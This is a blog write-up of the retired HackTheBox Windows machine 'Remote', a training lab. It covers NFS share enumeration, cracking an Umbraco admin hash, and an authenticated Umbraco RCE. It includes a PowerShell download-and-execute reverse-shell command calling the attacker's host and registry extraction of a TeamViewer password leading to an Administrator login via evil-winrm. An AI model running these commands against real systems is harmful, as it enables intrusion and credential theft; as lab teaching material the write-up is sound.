Remote – HackTheBox writeup

Remote – HackTheBox writeup
info

Remote is a retired vulnerable Windows machine available from HackTheBox. The machine maker is mrb3n, thank you. It has an Easy difficulty with a rating of 4.7 out of 10.

Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. No automated tools are needed. The goal is to obtain root shell together with both user & root flags.

Exploitation Summary (tap to reveal)

Initial Exploitation

  • Vulnerability: Remote Code Execution Vulnerability of CMS Umbraco + Credentials exposure
  • Explanation: Installed Umbraco CMS is vulnerable to remote code execution. The exploit requires credentials which can be obtained from Umbraco database file through NFS backup share

Privilege Escalation – from defaultapppool

  • Vulnerability: Credentials exposure of TeamViewer in registry
  • Explanation: TeamViewer’s security password can be retrieved from Windows registry. Although it is encrypted using AES, the IV and Key are known and is able to be decrypted to recover the password.

Enumeration

nmap -p- -A -T4 10.10.10.180
nmap
TCP 21: Microsoft ftpd
TCP 80: Microsoft httpd 2.0
TCP 445: Microsoft ds
TCP 2049: Mountd
TCP 5985: Microsoft httpd 2.0

Initial Exploitation

FTP connection is available and allows anonymous login. A lot of times you may find useful information about the system, sometimes even credentials. So let’s take a look:

ftp

Unfortunately, there isn’t anything. Let’s move on to the website at port 80:

homepage

Browsing through the pages we found some blog posts and products for sale. No other particular information other than a hash tag ‘umbraco‘. Searching umbraco at Google shows that it is an open source .NET CMS. Typical member login page is /umbraco.

I also use gobuster to perform a directory scan and /umbraco also shows up in the search.

login

Yup. That’s the login screen. Tried some typical credentials guessing but was not successful. Since there are some other interesting open ports, I will leave website here and explore other ports now.

Open port 2049 means NFS share may be available. Also with open port 111, we can use showmount to check available NFS shares:

showmount -e 10.10.10.180
showmount

There is a NFS share /site_backups available for everyone. Let’s mount the share and see if we can find something useful:

mkdir /mnt/site_backups
mount -t nfs 10.10.10.180:/site_backups /mnt/site_backups
ls /mnt/site_backups
nfs mount

Looks like a backup of the website with Umbraco CMS. Usually, content management systems store user credentials in some files or databases. Googling the term Umbraco credentials location helped me locate Umbraco.sdf file located under App_data folder.

Further research shows the .sdf is SQL Server Compact DB. And it is viewable using SQL Server Management Studio or Visual Studio. So I follow some instructions online and spent quite sometime to install SQL Server Management Studio (ended up newer versions no longer support SQL Server Compact), SQL Server Compact Toolbox for Visual Studio.

These attempts to view the .sdf database failed with an error stating the .sdf file is corrupted.

Turns out a simple utility is enough to find some useful information in the .sdf file: strings

credentials exposed

There are some username and password hashes at the beginning of the .sdf file. The highlighted one is the one I have cracked.

SHA1 Hash: b8be16afba8c314ad33d812f22a04991b90e2aaa

Using online SHA1 decrypt site I am able to recover the password quickly:

decrypted

Credentials obtained: admin@htb.local:baconandcheese

Now going back to Umbraco’s member login page and I am able to get in using the credentials retrieved:

umbraco logged in

Next is trying to see if Umbraco is exploitable. Google is our friend and I find a remote code execution vulnerability. It requires login credentials which we already have.

umbraco exploits

Both links provide python exploit scripts to perform RCE. I use exploit-db.com but this time the 2nd link (highlighted) seems to be more straight forward. So I download the script exploit.py and do some quick test:

python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c whoami
umbraco rce

Awesome, the exploit script works as intended and executed the command whoami, revealing that the account is defaultapppool. Time to get a reverse shell. Since it’s a Windows box, I am using Invoke-PowerShellTcp to obtain a PowerShell reverse shell.

  • prepare the PowerShell script by appending the execution of the Powershell reverse shell to kali IP address and port 4000:
cp $(locate Invoke-PowerShellTcp.ps1) .
echo Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.35 -Port 4000 >> Invoke-PowerShellTcp.ps1
  • start SimpleHTTPServer to host the Invoke-PowerShellTcp.ps1 file
python -m SimpleHTTPServer 80
  • start netcat to listen to port 4000 at kali
nc -nvlp 4000
  • run the exploit
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a "-NoProfile -Command iex(New-Object Net.WebClient).DownloadString('http://10.10.14.35/Invoke-PowerShellTcp.ps1')"

The exploit will execute a PowerShell command to download the file Invoke-PowerShellTcp.ps1 from my webserver and load it. And it should establish a reverse shell back to my netcat at kali:

initial shell obtained

Awesome! Initial shell obtained.

A quick navigation get us the user flag:

user flag

Privilege Escalation

Standard enumeration is performed and software TeamViewer stands out as installed software and a running service.

installed programs
tasklist /svc
tasklist

Let’s do some research at Google to see if there’s any vulnerabilities. We quickly find the TeamViewer 7 stores AES-128-CBC encrypted password in Windows registry. The encryption key & IV are also exposed.

teamviewer 7 vulnerability

Based on the article, the encrypted password is stored in registry key SecurityPasswordAES or OptionsPasswordAES. Let’s check it out:

reg query HKLM /f SecurityPasswordAES /s
teamviewer hash
Found password: FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B

The article also has the python script written to decrypt the password. Copy the python script and save it as passwordCrack.py. Then perform the crack:

crack teamviewer password

Wonderful. We found a password !R3m0te!. Let’s try to use it to login as Administrator. Since the port 5985 is open, which allows remote management using PowerShell, I am using evil-winrm to connect as Administrator:

evil-winrm -i 10.10.10.180 -p '!R3m0te!' -u administrator
root shell

That’s it! root shell obtained!

Final task to retrieve the root flag:

root flag

The exploits and enumeration needed to own this box is easy and pretty straight forward. But I did went down couple wrong paths spending extra hours to try out DB tools for .sdf file and couple different exploits for TeamViewer. All in all, a fun an easy box to enjoy.

Leave a Reply

Close Menu